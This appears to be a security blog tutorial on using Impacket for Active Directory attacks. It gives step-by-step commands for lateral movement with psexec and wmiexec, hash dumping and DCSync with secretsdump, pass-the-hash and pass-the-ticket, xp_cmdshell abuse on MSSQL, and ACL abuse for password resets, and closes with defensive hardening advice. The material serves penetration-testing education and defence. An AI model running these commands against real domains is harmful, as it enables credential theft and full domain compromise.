Listen to this Post
Introduction:
Impacket is a powerful Python library that provides low-level programmatic access to core Windows network protocols such as SMB, RPC, LDAP, and Kerberos. For penetration testers and red teams, Impacket’s suite of tools—including psexec, wmiexec, secretsdump, and smbexec—enables sophisticated Active Directory (AD) attacks, lateral movement, and credential abuse, turning a single foothold into full domain compromise.
Learning Objectives:
- Execute remote commands and lateral movement using Impacket’s SMB-based tools (psexec, wmiexec) across a Windows domain.
- Dump NTDS.dit hashes and perform DCSync attacks to extract credential material from domain controllers.
- Conduct Kerberos attacks such as Pass-the-Hash (PtH) and Pass-the-Ticket (PtT) to escalate privileges and maintain persistence.
You Should Know:
1. Installing Impacket on Linux and Windows
Impacket requires Python 3.6+ and is available via GitHub or pip. For Linux (Kali/Parrot/Ubuntu), use the following commands to install from source (recommended for the latest tools):
sudo apt update && sudo apt install python3-pip git -y git clone https://github.com/SecureAuthCorp/impacket.git cd impacket pip3 install .
For a quick installation via pip (slightly older version):
pip3 install impacket
On Windows, install Python 3, then open Command Prompt as Administrator:
pip install impacket
Verify installation by running any tool, e.g.:
psexec.py -h
Step‑by‑step: After installing, navigate to the `impacket/examples/` directory (if cloned) or simply call the scripts from anywhere in your PATH. Ensure firewall rules allow outbound SMB (port 445) and RPC (port 135) to target machines.
2. Lateral Movement with psexec and wmiexec
These tools allow remote command execution using valid credentials or NTLM hashes. Use `psexec.py` to upload a service and execute commands interactively:
psexec.py domain/user:password@target_ip
If you have an NTLM hash instead of a plaintext password (Pass-the-Hash), use:
psexec.py domain/user@target_ip -hashes :ntlm_hash
For a stealthier approach (no service binary written to disk), use wmiexec.py:
wmiexec.py domain/user:password@target_ip "cmd /c whoami"
Step‑by‑step:
- Step 1: Obtain a set of domain credentials or an NTLM hash (e.g., from a compromised workstation).
- Step 2: Identify a reachable target (e.g., a file server or a second workstation) using
nmap -p445 <subnet>. - Step 3: Run `psexec.py` for an interactive shell or `wmiexec.py` for single commands.
- Step 4: Use the resulting shell to enumerate further, dump credentials, or deploy persistence.
3. Credential Dumping: secretsdump and DCSync
`secretsdump.py` extracts password hashes from local SAM files, cached credentials, and NTDS.dit (domain database). Use it against a domain controller with sufficient privileges:
secretsdump.py domain/admin_user:password@dc_ip
To perform a DCSync attack (simulate a domain controller replicating hashes), use:
secretsdump.py domain/admin_user:password@dc_ip -just-dc-ntlm
Step‑by‑step:
- Step 1: Obtain administrative privileges on any domain-joined machine or directly on the DC.
- Step 2: Execute `secretsdump.py` with the target DC’s IP. The tool will attempt to use DRSUAPI (Directory Replication Service) to request all user hashes.
- Step 3: Save the output (especially the `KRBTGT` hash and domain admin hashes) for offline cracking or PtH attacks.
- Step 4: Use the extracted hashes to pivot to other systems using `psexec.py` or
wmiexec.py.
4. Kerberos Attacks: Pass-the-Hash and Pass-the-Ticket
Impacket supports Kerberos authentication, enabling Pass-the-Ticket (PtT) attacks. First, extract a ticket from memory using Mimikatz or Rubeus on a compromised host. Then use `wmiexec.py` with the ticket file:
export KRB5CCNAME=/path/to/ticket.ccache wmiexec.py -k domain/user@target_ip -no-pass
For Pass-the-Hash (PtH) against Kerberos-enabled services, use `psexec.py` with the `-hashes` flag as shown earlier, but note that PtH works over SMB (NTLM) rather than Kerberos. For a true Kerberos PtH, you can use `getTGT.py` to generate a ticket from a hash:
getTGT.py domain/user -hashes :ntlm_hash export KRB5CCNAME=user.ccache
Step‑by‑step:
- Step 1: Obtain a user’s NTLM hash (via secretsdump or Mimikatz).
- Step 2: Use `getTGT.py` to request a Ticket Granting Ticket (TGT) from the KDC.
- Step 3: Set the `KRB5CCNAME` environment variable to point to the saved ticket.
- Step 4: Run Impacket tools with the `-k` option to authenticate via Kerberos, bypassing NTLM restrictions.
5. MSSQL Exploitation with Impacket
`mssqlclient.py` allows remote query execution, command execution via xp_cmdshell, and privilege escalation on MSSQL servers. Basic authentication:
mssqlclient.py domain/user:password@sql_server_ip
If you have administrative privileges, enable xp_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Then execute OS commands:
xp_cmdshell 'whoami > C:\temp\out.txt';
Step‑by‑step:
- Step 1: Identify MSSQL instances (port 1433) using Nmap.
- Step 2: Connect with `mssqlclient.py` using stolen credentials or hashes (supports NTLM authentication).
- Step 3: Enumerate database roles—if `sysadmin` role is present, enable xp_cmdshell.
- Step 4: Run commands to download payloads, add users, or dump credentials.
6. ACL Abuse and Privilege Escalation
Impacket’s `dacledit.py` and `owner.py` manipulate Active Directory access control lists (ACLs) to escalate privileges. For example, grant `GenericAll` rights over a target user:
dacledit.py -action write -delegate 'attacker_user' -target 'target_user' -rights GenericAll domain/user:password@dc_ip
Then change the target’s password using `smbpasswd.py`:
smbpasswd.py domain/attacker_user@dc_ip -newpass NewPass123 -oldpass oldpass
Step‑by‑step:
- Step 1: Enumerate ACLs using `BloodHound` or
dacledit.py -action read. - Step 2: Identify a misconfigured ACE (e.g., a user having `WriteProperty` on another user).
- Step 3: Use `dacledit.py` to add `ForceChangePassword` or `GenericAll` rights for your attacker account.
- Step 4: Change the target’s password or add a Kerberos resource-based constrained delegation.
7. Defensive Mitigations and Hardening
To defend against Impacket-based attacks, implement these hardening measures:
– Restrict SMB signing and enforce LDAP signing to prevent relay attacks. On Windows Domain Controllers, set `Domain controller: LDAP server signing requirements` to Require signing.
– Enable Windows Defender Credential Guard to protect NTLM hashes and Kerberos tickets from being dumped.
– Deploy Microsoft ATA (Advanced Threat Analytics) or Microsoft Defender for Identity to detect DCSync and Pass-the-Hash attempts.
– Use local administrator password solutions (LAPS) to randomize local admin passwords and prevent lateral movement with the same hash.
– Monitor for suspicious use of DRSUAPI (Event ID 4662 with Object Type ds-Replication-Get-Changes)—this indicates a DCSync attack.
– Linux defenders: Block outbound SMB (port 445) and RPC (135, 49152-65535) from non‑Windows hosts. Use iptables:
sudo iptables -A OUTPUT -p tcp --dport 445 -j DROP
What Undercode Say:
- Key Takeaway 1: Impacket transforms a single compromised credential into full Active Directory compromise by providing atomic, scriptable tools for every major AD attack vector—lateral movement, credential dumping, and Kerberos abuse.
- Key Takeaway 2: Defenders must shift from relying on perimeter security to active monitoring of protocol‑level anomalies, especially DRSUAPI replication requests and unusual SMB service creation, as Impacket’s low‑level approach bypasses traditional antivirus and EDR often misses its benign‑looking Python execution.
Impacket is not just a toolset; it is a complete framework that mirrors how attackers think—by speaking native Windows protocols at a low level. Its popularity among red teams has forced a re-evaluation of Active Directory hardening: pass‑the‑hash is still viable because many organisations neglect to enable SMB signing or Credential Guard. Meanwhile, DCSync remains the gold standard for extracting all domain hashes in seconds. For blue teams, the only reliable detection is at the network layer—looking for DCE/RPC calls for DRSUAPI or service creation requests on the fly. Training courses that incorporate Impacket labs give defenders hands‑on exposure to these techniques, making the difference between theoretical knowledge and practical incident response.
Prediction:
As hybrid and cloud‑joined environments expand, Impacket will evolve to support cloud‑based identity providers (Azure AD, AWS Managed AD) with similar protocol abuse techniques. We will see Impacket forks that integrate with Graph API and OAuth token manipulation, blurring the line between on‑prem AD and cloud identity attacks. Consequently, Microsoft and other vendors will be forced to release native Linux tools for monitoring and blocking these protocol interactions, shifting the cybersecurity arms race into a new era of cross‑platform detection and response.
▶️ Related Video (86% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Activedirectory Impacket – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
